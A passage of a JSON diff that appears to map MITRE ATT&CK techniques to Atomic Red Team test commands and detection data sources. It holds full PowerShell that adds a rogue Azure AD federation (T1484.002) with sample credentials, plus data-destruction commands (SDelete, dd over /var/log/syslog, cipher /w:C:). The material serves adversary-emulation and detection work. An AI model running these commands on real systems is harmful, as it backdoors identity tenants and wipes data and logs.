about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + 
"collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + 
"host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1484.002", + "command_list": [ + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contosocloud.com\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" 
}\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"iamthebatman\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"https://sts.contoso.com/adfs/ls/\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = 
$federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"http://sts.contoso.com/adfs/services/trust\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", 
$Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"https://sts.contoso.com/adfs/services/trust/mex\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"MzAgODIgMDEgMGEgMD...gZWQgOTkgMDIgMDMgMDEgMDAgMDE=\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host 
\"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"contoso.com\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"contoso.com\"\nWrite-Host \"End of federation configuration.\"\n" + ], + "commands": [ + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contosocloud.com\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = 
$federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + }, + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"iamthebatman\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + 
"source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + }, + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"https://sts.contoso.com/adfs/ls/\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + }, + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = 
\"http://sts.contoso.com/adfs/services/trust\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + }, + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"https://sts.contoso.com/adfs/services/trust/mex\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" 
}\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + }, + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"MzAgODIgMDEgMGEgMD...gZWQgOTkgMDIgMDMgMDEgMDAgMDE=\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + }, + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object 
Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"contoso.com\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"contoso.com\"\nWrite-Host \"End of federation configuration.\"\n", + "source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1484.002", + "display_name": "Domain Trust Modification", + "atomic_tests": [ + { + "name": "Add Federation to Azure AD", + "auto_generated_guid": "8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7", + "description": "Add a new federation to Azure AD using PowerShell. 
The malicious Identity Provider to be added must be configured beforehand.\nIf ADFS is used as IdP, the Uris parameters can be found at 'https://..com/federationmetadata/2007-06/federationmetadata.xml'\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "azure_username": { + "description": "Username of a privileged Azure AD account such as External Identity Provider Administrator or Global Administrator roles", + "type": "String", + "default": "bruce.wayne@contosocloud.com" + }, + "azure_password": { + "description": "Password of azure_username", + "type": "String", + "default": "iamthebatman" + }, + "active_logon_uri": { + "description": "Active Logon Uri, available in federation metadata at field if ADFS is used.", + "type": "String", + "default": "https://sts.contoso.com/adfs/ls/" + }, + "issuer_uri": { + "description": "Issuer Uri, available in federation metadata at the \"entityID\" field if ADFS is used.", + "type": "String", + "default": "http://sts.contoso.com/adfs/services/trust" + }, + "metadata_uri": { + "description": "Metadata exchange Uri, available in federation metadata at
field if ADFS is used.", + "type": "String", + "default": "https://sts.contoso.com/adfs/services/trust/mex" + }, + "public_key": { + "description": "Public key of the X509 signing token certificate, in base64", + "type": "String", + "default": "MzAgODIgMDEgMGEgMD...gZWQgOTkgMDIgMDMgMDEgMDAgMDE=" + }, + "domain_name": { + "description": "New federation domain name", + "type": "String", + "default": "contoso.com" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AzureADPreview Powershell module must be installed. The Identity Provider to be federated must be configured (outside of the scope of this test).\n", + "prereq_command": "if (Get-Module AzureADPreview) {exit 0} else {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureADPreview -Force\n" + } + ], + "executor": { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName 
\"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "cleanup_command": "try {\nImport-Module AzureADPreview -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential -ErrorAction Ignore\nRemove-AzureADExternalFederationDomain -ExternalDomainName \"#{domain_name}\"\n} catch {}\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object creation", + "description": "An active directory object was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": 
"command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1485", + "command_list": [ + "if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }\nInvoke-Expression -Command \"$env:TEMP\\Sdelete\\sdelete.exe -accepteula #{file_to_delete}\"\n", + "if (-not (Test-Path $env:TEMP\\T1485.txt)) { New-Item $env:TEMP\\T1485.txt -Force }\nInvoke-Expression -Command \"#{sdelete_exe} -accepteula $env:TEMP\\T1485.txt\"\n", + "dd of=#{file_to_overwrite} if=/dev/zero count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes\n", + "dd of=/var/log/syslog if=#{overwrite_source} count=$(ls -l /var/log/syslog | awk '{print $5}') iflag=count_bytes\n", + "cipher.exe /w:C:\n" + ], + "commands": [ + { + "command": "if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }\nInvoke-Expression -Command \"$env:TEMP\\Sdelete\\sdelete.exe -accepteula #{file_to_delete}\"\n", + "source": "atomics/T1485/T1485.yaml", + 
"name": "Atomic Red Team Test - Data Destruction" + }, + { + "command": "if (-not (Test-Path $env:TEMP\\T1485.txt)) { New-Item $env:TEMP\\T1485.txt -Force }\nInvoke-Expression -Command \"#{sdelete_exe} -accepteula $env:TEMP\\T1485.txt\"\n", + "source": "atomics/T1485/T1485.yaml", + "name": "Atomic Red Team Test - Data Destruction" + }, + { + "command": "dd of=#{file_to_overwrite} if=/dev/zero count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes\n", + "source": "atomics/T1485/T1485.yaml", + "name": "Atomic Red Team Test - Data Destruction" + }, + { + "command": "dd of=/var/log/syslog if=#{overwrite_source} count=$(ls -l /var/log/syslog | awk '{print $5}') iflag=count_bytes\n", + "source": "atomics/T1485/T1485.yaml", + "name": "Atomic Red Team Test - Data Destruction" + }, + { + "command": "cipher.exe /w:C:\n", + "source": "atomics/T1485/T1485.yaml", + "name": "Atomic Red Team Test - Data Destruction" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1485", + "display_name": "Data Destruction", + "atomic_tests": [ + { + "name": "Windows - Overwrite file with Sysinternals SDelete", + "auto_generated_guid": "476419b5-aebf-4366-a131-ae3e8dae5fc2", + "description": "Overwrites and deletes a file using Sysinternals SDelete. 
Upon successful execution, \"Files deleted: 1\" will be displayed in\nthe powershell session along with other information about the file that was deleted.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "sdelete_exe": { + "description": "Path of sdelete executable", + "type": "Path", + "default": "$env:TEMP\\Sdelete\\sdelete.exe" + }, + "file_to_delete": { + "description": "Path of file to delete", + "type": "Path", + "default": "$env:TEMP\\T1485.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})\n", + "prereq_command": "if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/SDelete.zip\" -OutFile \"$env:TEMP\\SDelete.zip\"\nExpand-Archive $env:TEMP\\SDelete.zip $env:TEMP\\Sdelete -Force\nRemove-Item $env:TEMP\\SDelete.zip -Force\n" + } + ], + "executor": { + "command": "if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }\nInvoke-Expression -Command \"#{sdelete_exe} -accepteula #{file_to_delete}\"\n", + "name": "powershell" + } + }, + { + "name": "macOS/Linux - Overwrite file with DD", + "auto_generated_guid": "38deee99-fd65-4031-bec8-bfa4f9f26146", + "description": "Overwrites and deletes a file using DD.\nTo stop the test, break the command with CTRL/CMD+C.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "overwrite_source": { + "description": "Path of data source to overwrite with", + "type": "Path", + "default": "/dev/zero" + }, + "file_to_overwrite": { + "description": "Path of file to overwrite and remove", + "type": "Path", + "default": "/var/log/syslog" + } + }, + "executor": { + "command": "dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes\n", + "name": "bash" + } + }, + { + 
